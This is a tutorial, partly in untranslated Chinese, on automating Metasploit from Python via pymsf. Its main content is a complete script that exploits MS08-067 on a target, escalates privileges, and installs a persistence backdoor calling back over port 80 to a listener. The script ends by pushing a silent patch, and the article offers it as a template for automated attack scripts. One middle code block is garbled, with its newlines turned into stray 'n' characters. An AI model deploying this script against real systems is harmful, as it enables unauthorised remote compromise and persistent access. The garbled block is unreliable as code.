0xA: Metasploit in Python
## Metasploit in Python
pymsf is a Python module written by SpiderLabs that talks to Metasploit over its msgrpc interface. Before it can be used, the msgrpc service must be started inside msfconsole with the following command:

```
load msgrpc Pass=<password>
```
Talking to msgrpc is really talking to msfconsole. First you create an Msfrpc object, log in to the msgrpc server and create a virtual console; you can then send strings containing several commands to that console. Commands are executed by calling the module's console.write method, and the resulting output is read back from the virtual console with console.read. This article shows how to use the pymsf module and how to build a complete script with it.

Here is a function that creates an Msfrpc instance, logs in to the msgrpc server and creates a virtual console:

```python
def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ress = client.call('console.create')
    console_id = ress['id']
```
The next step is to send a multi-line string of commands to the virtual console, writing it with console.write and reading the console's output back with console.read:

```python
    ## Exploit MS08-067 ##
    commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
    print("[+] Exploiting MS08-067 on: "+RHOST)
    client.call('console.write', [console_id, commands])
    res = client.call('console.read', [console_id])
    result = res['data'].split('\n')
```
The following snippet creates an MSF resource file, so that a series of commands stored in a file can be executed with the "resource" command. Here the file escalates privileges with "getsystem", installs a persistence backdoor that calls back over port 80 and keeps running permanently, and finally uploads our patch and installs it quietly from the command line:

```python
# This function creates the MSF .rc file
def builder(RHOST, LHOST, LPORT):
    post = open('/tmp/smbpost.rc', 'w')
    bat = open('/tmp/ms08067_install.bat', 'w')

    postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
    batcomm = "ms08067_patch.exe /quiet"
    post.write(postcomms); bat.write(batcomm)
    post.close(); bat.close()
```
通過上面的那段代碼,將會創建一個.rc的文件.通過msf模塊「post/multi/gather/run_console_rc_file」在當前的meterpreter會話中運行生成的文件,並且通過console.write命令從虛擬終端寫入數據,通過console.read命令來回顯返回內容:
## 運行生成的exp ##nrunPost = """use post/multi/gather/run_console_rc_filenset RESOURCE /tmp/smbpost.rcnset SESSION """+session+"""nexploitn"""n print "[+] Running post-exploit script on: "+RHOSTn client.call(console.write,[console_id,runPost])n rres = client.call(console.read,[console_id])n## Setup Listener for presistent connection back over port 80 ##n sleep(10)n listen = """use exploit/multi/handlernset PAYLOAD windows/meterpreter/reverse_tcpnset LPORT 80nset LHOST """+LHOST+"""nexploitn"""nprint "[+] Setting up listener on: "+LHOST+":80"nclient.call(console.write,[console_id,listen])nlres = client.call(console.read,[console_id])nprint lresn
The variables used above (RHOST, LHOST, LPORT and so on) are read from the command line with the optparse module. The complete script is hosted on GitHub. Note that the paths the script uses are fixed: the files are not generated anywhere else, so for example the MS08-067 patch must be present in your /tmp/ directory. Once you understand the basics, a few modifications to the code below will give you your own automated msf attack script; we suggest starting from the simple examples published on the blog and then writing your own:

```python
import msfrpc, optparse, sys
from time import sleep

# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
    post = open('/tmp/smbpost.rc', 'w')
    bat = open('/tmp/ms08067_install.bat', 'w')

    postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
    batcomm = "ms08067_patch.exe /quiet"
    post.write(postcomms); bat.write(batcomm)
    post.close(); bat.close()

# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch
def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ress = client.call('console.create')
    console_id = ress['id']

    ## Exploit MS08-067 ##
    commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
    print("[+] Exploiting MS08-067 on: "+RHOST)
    client.call('console.write', [console_id, commands])
    res = client.call('console.read', [console_id])
    result = res['data'].split('\n')

    ## Run post-exploit script ##
    runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
    print("[+] Running post-exploit script on: "+RHOST)
    client.call('console.write', [console_id, runPost])
    rres = client.call('console.read', [console_id])
    ## Setup listener for persistent connection back over port 80 ##
    sleep(10)
    listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
    print("[+] Setting up listener on: "+LHOST+":80")
    client.call('console.write', [console_id, listen])
    lres = client.call('console.read', [console_id])
    print(lres)

def main():
    parser = optparse.OptionParser(sys.argv[0] +
                                   ' -p LPORT -r RHOST -l LHOST -s SESSION')
    parser.add_option('-p', dest='LPORT', type='string',
                      help='specify a port to listen on')
    parser.add_option('-r', dest='RHOST', type='string',
                      help='specify a remote host')
    parser.add_option('-l', dest='LHOST', type='string',
                      help='specify a local host')
    parser.add_option('-s', dest='session', type='string',
                      help='specify session ID')
    (options, args) = parser.parse_args()
    session = options.session
    RHOST = options.RHOST; LHOST = options.LHOST; LPORT = options.LPORT

    # Every option is required: the strings are concatenated into commands,
    # so a missing value would raise a TypeError later on.
    if None in (RHOST, LPORT, LHOST, session):
        print(parser.usage)
        sys.exit(0)

    builder(RHOST, LHOST, LPORT)
    sploiter(RHOST, LHOST, LPORT, session)

if __name__ == "__main__":
    main()
```
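As an added example (not from the original post or from pymsf), here is a console.read poll loop: the script above reads the console once right after writing, but msfconsole returns output in fragments for as long as a module is busy, so a single read can miss most of it. FakeMsfrpc is a constructed stand-in for msfrpc.Msfrpc, and the data/prompt/busy reply keys are assumed from the Metasploit RPC console.read API.

```python
import time

class FakeMsfrpc(object):
    """Constructed stand-in for msfrpc.Msfrpc: replays scripted console.read replies."""

    def __init__(self, responses):
        self._responses = list(responses)
        self.calls = []

    def call(self, method, args=None):
        self.calls.append(method)
        if method == 'console.read' and self._responses:
            return self._responses.pop(0)
        # Assumed idle reply shape (data/prompt/busy), as in the real RPC API.
        return {'data': '', 'prompt': 'msf > ', 'busy': False}

def read_until_idle(client, console_id, timeout=30.0, poll=0.0):
    """Keep calling console.read until the console reports busy=False.

    Output arrives in fragments while a module runs, so a single read
    (as in the script above) can miss most of it. Raises on timeout.
    """
    deadline = time.time() + timeout
    chunks = []
    while True:
        res = client.call('console.read', [console_id])
        if res.get('data'):
            chunks.append(res['data'])
        if not res.get('busy'):
            return ''.join(chunks)
        if time.time() > deadline:
            raise RuntimeError('console %s still busy after %.0fs'
                               % (console_id, timeout))
        time.sleep(poll)

def console_output_lines(output):
    """Split collected console output into non-empty lines."""
    return [line for line in output.split('\n') if line.strip()]

if __name__ == '__main__':
    # Constructed replies: two busy fragments, then the idle prompt.
    fake = FakeMsfrpc([
        {'data': '[*] Module started\n', 'prompt': '', 'busy': True},
        {'data': '[*] Still running\n', 'prompt': '', 'busy': True},
        {'data': '[*] Module finished\n', 'prompt': 'msf > ', 'busy': False},
    ])
    for line in console_output_lines(read_until_idle(fake, '0')):
        print(line)
```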